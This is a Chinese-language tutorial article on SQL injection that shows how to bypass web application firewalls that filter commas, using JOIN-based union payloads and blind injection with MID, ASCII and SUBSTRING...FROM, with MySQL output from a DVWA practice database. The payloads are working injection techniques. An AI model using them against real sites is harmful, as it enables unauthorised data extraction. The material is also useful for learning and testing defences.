共計 3846 個字符,預計需要花費 10 分鐘才能閱讀完成。
丸趣 TV 小編給大家分享一下 SQL 注入技巧之顯注與盲注中過濾逗號繞過的示例分析,相信大部分人都還不怎么了解,因此分享這篇文章給大家參考一下,希望大家閱讀完這篇文章后大有收獲,下面讓我們一起去了解一下吧!
1. 聯合查詢顯注繞過逗號
在聯合查詢時使用 UNION SELECT 1,2,3,4,5,6,7..n 這樣的格式爆顯示位,語句中包含了多個逗號,如果有 WAF 攔截了逗號時,我們的聯合查詢不能用了。
繞過
在顯示位上替換為常見的注入變量或其它語句
union select 1,2,3;
union select * from ((select 1)A join (select 2)B join (select 3)C);
union select * from ((select 1)A join (select 2)B join (select group_concat(user(), ,database(), ,@@datadir))C);在數據庫中演示聯合查詢
UNION 開始是我們在 URL 中注入的語句,這里只是演示,在實際中如果我們在注入語句中有逗號就可能被攔截
mysql select user_id,user,password from users union select 1,2,3;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3 |
+---------+-------+----------------------------------+
2 rows in set (0.04 sec)不出現逗號,使用 Join 來注入
mysql select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select 3)C);
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | 3 |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)查詢我們想要的數據
mysql select user_id,user,password from users union select * from ((select 1)A join (select 2)B join (select group_concat(user(), ,database(), ,@@datadir))C);;
+---------+-------+-------------------------------------------------+
| user_id | user | password |
+---------+-------+-------------------------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 1 | 2 | root@192.168.228.1 dvwa c:\phpStudy\MySQL\data\ |
+---------+-------+-------------------------------------------------+
2 rows in set (0.08 sec)2. 盲注中逗號繞過
MID 和 substr 函數用于從文本字段中提取字符
mysql select mid(user(),1,2);
+-----------------+
| mid(user(),1,2) |
+-----------------+
| ro |
+-----------------+
1 row in set (0.04 sec)查詢數據庫用戶名第一個字符的 ascii 碼
mysql select user_id,user,password from users union select ascii(mid(user(),1,2)),2,3;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 114 | 2 | 3 |
+---------+-------+----------------------------------+
2 rows in set (0.05 sec)盲注,通過猜 ascii 值
mysql select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=115) ;
Empty set
mysql select user_id,user,password from users where user_id=1 and (select ascii(mid(user(),1,2))=114) ;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.04 sec)逗號繞過 SUBTTRING 函數
substring(str FROM pos)
從字符串 str 的起始位置 pos 返回一個子串
mysql select substring(hello from 1);
+---------------------------+
| substring(hello from 1) |
+---------------------------+
| hello |
+---------------------------+
1 row in set (0.04 sec)
mysql select substring(hello from 2);
+---------------------------+
| substring(hello from 2) |
+---------------------------+
| ello |
+---------------------------+
1 row in set (0.03 sec)注入
mysql select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=114) ;
Empty set
//substring(user() from 2) 為 o
// o 的 ascii 為 111,mysql select user_id,user,password from users where user_id=1 and (ascii(substring(user() from 2))=111) ;
+---------+-------+----------------------------------+
| user_id | user | password |
+---------+-------+----------------------------------+
| 1 | admin | 5f4dcc3b5aa765d61d8327deb882cf99 |
+---------+-------+----------------------------------+
1 row in set (0.03 sec)以上是“SQL 注入技巧之顯注與盲注中過濾逗號繞過的示例分析”這篇文章的所有內容,感謝各位的閱讀!相信大家都有了一定的了解,希望分享的內容對大家有所幫助,如果還想學習更多知識,歡迎關注丸趣 TV 行業資訊頻道!
正文完
